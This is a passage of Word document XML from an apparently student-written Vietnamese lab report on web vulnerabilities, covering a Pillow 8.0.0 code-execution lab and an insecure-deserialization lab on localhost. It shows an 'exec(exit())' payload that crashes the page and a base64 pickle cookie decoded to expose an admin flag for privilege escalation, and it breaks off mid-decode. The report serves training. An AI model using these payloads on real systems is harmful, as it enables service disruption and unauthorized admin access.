        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>Using Components with Known Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0C808" w14:textId="391AECC3" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003705F5" w:rsidRPr="003705F5">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t xml:space="preserve">ồn tại lỗ hổng liên quan đến việc sử dụng các thành phần có lỗ hổng đã biết, dẫn đến nguy cơ thực hiện các lệnh thực thi không mong muốn. </w:t>
      </w:r>
      <w:r w:rsidR="003705F5">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>ập trung vào việc thực hiện truyền lệnh thực thi vào để ngắt luồng hoạt động của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126CEF8" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DEF341" w14:textId="49DFB2C8" w:rsidR="00EC0F26" w:rsidRDefault="003705F5" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ruy cập vào task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C270BDD" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00442F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DF3DB12" wp14:editId="6F282CAF">
            <wp:extent cx="6115050" cy="2489835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="201677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75060" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2489835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FECB85" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t xml:space="preserve">Với </w:t>
      </w:r>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lab 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D26390" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00442F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73472C08" wp14:editId="0C7135DB">
            <wp:extent cx="6115050" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1177648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48630" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2799715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="474278A2" w14:textId="5B690612" w:rsidR="00EC0F26" w:rsidRPr="003705F5" w:rsidRDefault="003705F5" w:rsidP="003705F5">
      <w:r w:rsidRPr="003705F5">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:t>hận thấy rằng đây là một trang web dùng để chuyển đổi dạng ảnh bằng lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AB937" w14:textId="52024A1E" w:rsidR="00EC0F26" w:rsidRDefault="003705F5" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:t>hực hiện upload ảnh bất kỳ</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08404F12" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002146D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2BCB47" wp14:editId="21224FE4">
            <wp:extent cx="4654789" cy="2597283"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1354341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41602" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4654789" cy="2597283"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26262215" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6507B" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="002146D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5FA34A" wp14:editId="3C080FF8">
            <wp:extent cx="6115050" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1501172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172700" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2856865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A31C9" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Theo như gợi ý từ yêu cầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4C137" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="002146D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C597EE1" wp14:editId="306532CA">
            <wp:extent cx="6115050" cy="1261745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118864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40830" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1261745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E05229D" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="003705F5" w:rsidRDefault="00EC0F26" w:rsidP="003705F5">
      <w:r w:rsidRPr="003705F5">
        <w:t>Tra cứu về package Pillow 8.0.0 và tìm thấy một lỗi báo cáo về việc thực thi mã nguy hiểm này tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660DAD63" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidRPr="009123DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sca.analysiscenter.veracode.com/vulnerability-database/security/arbitrary-code-execution/python/sid-22250</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35C18C54" w14:textId="73928466" w:rsidR="00EC0F26" w:rsidRDefault="003705F5" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:t>ruyề</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="002146D4">
        <w:t xml:space="preserve">n lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="002146D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exec(exit())</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="002146D4">
        <w:t xml:space="preserve"> để thực hiện ngắt luồng hoạt động của trang</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31326E" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E658B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="355A39F0" wp14:editId="616D7BC2">
            <wp:extent cx="5163271" cy="1933845"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1392123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23650" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5163271" cy="1933845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43687D7A" w14:textId="76749EEC" w:rsidR="00EC0F26" w:rsidRPr="003705F5" w:rsidRDefault="00EC0F26" w:rsidP="003705F5">
      <w:r w:rsidRPr="003705F5">
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả sau khi submit, trang web bị down và khai thác lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="003705F5" w:rsidRPr="003705F5">
        <w:t xml:space="preserve"> thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA29128" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00E658B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4031BDEF" wp14:editId="4F504859">
            <wp:extent cx="6115050" cy="3013075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1711102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02014" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3013075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A76B38" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Nhấn Try Again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C92C51" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00E658B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F465F5" wp14:editId="1BF849DD">
            <wp:extent cx="6115050" cy="2096135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="332248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48331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2096135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB60B9E" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> High (cao) vì lỗ hổng này có thể dẫn đến việc thực thi các lệnh không mong muốn trên máy chủ, gây ra nguy cơ cho tính bảo mật của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8B7B1" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Khuyến cáo khắc phục: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>Cần thực hiện việc lọc đầu vào các lệnh input khi thực hiện để ngăn chặn việc thực thi các lệnh nguy hiểm. Đồng thời, cần cập nhật các thành phần có lỗ hổng đã biết lên phiên bản mới nhất để giảm thiểu nguy cơ từ các lỗ hổng đã được công bố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DBCE8E" w14:textId="7C517F6D" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc175959229"/>
      <w:bookmarkStart w:id="70" w:name="_Toc182909881"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>05: Insecure Deserialization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="6BC5277D" w14:textId="1145B679" w:rsidR="001035B9" w:rsidRPr="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidRPr="001035B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/insec_des_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C6FD2E2" w14:textId="5865AC95" w:rsidR="000B1A1D" w:rsidRPr="000B1A1D" w:rsidRDefault="000B1A1D" w:rsidP="000B1A1D">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu đề:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1A1D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001035B9">
        <w:t>Insecure Deserialization</w:t>
      </w:r>
      <w:r w:rsidR="003705F5" w:rsidRPr="001035B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FDB7A" w14:textId="53030BC4" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003705F5" w:rsidRPr="003705F5">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>ử dụng lỗ hổng deserialization không an toàn để thực hiện leo quyền admin thông qua việc chỉnh sửa cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3B283" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44183E" w14:textId="0DEE859E" w:rsidR="00EC0F26" w:rsidRPr="000B1A1D" w:rsidRDefault="000B1A1D" w:rsidP="000B1A1D">
      <w:r w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:t>hực hiện truy cập vào lab và chỉ thấy admin mới có thể nhìn thấy trang này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62D564" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="000B1A1D" w:rsidRDefault="00EC0F26" w:rsidP="000B1A1D">
      <w:r w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F365F4E" wp14:editId="03F2F9C6">
            <wp:extent cx="6115050" cy="960755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120806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6637" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId153"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="960755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1597C" w14:textId="36E75185" w:rsidR="00EC0F26" w:rsidRPr="000B1A1D" w:rsidRDefault="000B1A1D" w:rsidP="000B1A1D">
      <w:r w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:t xml:space="preserve"> Ý </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:t xml:space="preserve">tưởng là sẽ kiểm tra phần cookie. </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:t>hực hiện như sau</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2C323" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B64CA84" wp14:editId="04B9FC87">
            <wp:extent cx="6115050" cy="1367155"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="723456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56309" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId154"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1367155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7534EE6D" w14:textId="0DE1AE62" w:rsidR="00EC0F26" w:rsidRPr="000B1A1D" w:rsidRDefault="000B1A1D" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oken:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gASVNAAAAAAAAACMEmludHJvZHVjdGlvbi52aWV3c5SMCFRlc3RVc2VylJOUKYGUfZSMBWFkbWlulEsAc2Iu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABCE34" w14:textId="7DE0F92E" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D">
        <w:t xml:space="preserve">, thực hiện </w:t>
      </w:r>
      <w:r>
        <w:t>decode (base64) ra và kết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C124514" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>��������</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>introduction.views</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>TestUser</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>���</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
